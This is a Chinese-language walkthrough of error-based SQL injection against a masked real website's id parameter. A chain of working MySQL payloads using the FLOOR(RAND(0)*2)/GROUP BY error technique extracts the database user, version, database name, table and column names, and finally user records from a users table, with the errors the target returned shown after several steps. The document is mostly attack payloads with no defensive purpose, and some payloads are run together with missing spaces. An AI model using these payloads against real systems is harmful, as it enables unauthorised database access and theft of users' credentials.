1.注入点:
http://www.******/index.php?********&id=14
2.确定当前用户:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x23232323,(MID((IFNULL(CAST( CURRENT_USER() ASCHAR),0x20)),1,50)),0x23232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:*******_dbadmin@localhost
3.确定数据库版本:
AND (SELECT 8471 FROM (SELECT COUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
解析如下:
AND(
SELECT 8471 FROM
(SELECT COUNT(*),
CONCAT(0x716b6b7671,
(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x
FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x
)a
)
提示错误: 5.5.37-cll
4.确定数据库:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST( DATABASE() ASCHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:******_web
5.确定当前is_dba:(此语句搞错了)
AND (SELECT 3040 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x616f7061636f5f646261646d696e LIMIT 0,1)=0x59) THEN 1ELSE 0 END)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)
6.确定数据库中的表个数及其名称:
AND (SELECT 4537 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT IFNULL(CAST(COUNT(table_name) ASCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN(0x***************)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
提示错误:个数是166个,,,提示 table_schema in(0x******************),参数为数据库名称的十六进制表示
以此确定每个表的名称:
AND(SELECT 7765 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x*******************) LIMIT0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)
---- 提示:limit 0,1是确定表名称的次序。0,1表示第一个表名称;1,1表示第二个表名称;33,1表示第34个表的名称。提示table_name=0x6a74626c5f7573657273 AND table_schema=0x******************,第一个参数为表名称,第二个参数数据库名称
提示错误:
7.确定表的列数及其名称:
AND(SELECT 1107 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTIFNULL(CAST(COUNT(*)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*************************),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
依次确定列名称:
AND(SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*********************LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
解析基于错误的SQL语句:
解析结果如下:
SELECT 4537 FROM
(
SELECT COUNT(*),
CONCAT(
0x716b6b7671,
(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20)
FROM INFORMATION_SCHEMA.TABLES
WHERE table_schema IN (0x*****************)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x
)a
红色部分:根据个人需求变化
8.查询指定列字段名
14 AND (SELECT 3313 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********************** AND (column_name=0x******************) LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
语句中column_name=0x******************查询列字段的名称(16进制)
9.查询指定列字段的数据类型
AND (SELECT 6785 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50)FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x******** AND (column_name=0x70617373776f7264) LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
10.查询内部用户的信息:
AND (SELECT 3225 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(columns_name AS CHAR),0x20)),1,50) FROM *****_web.jtbl_users where username=0x6164616d LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)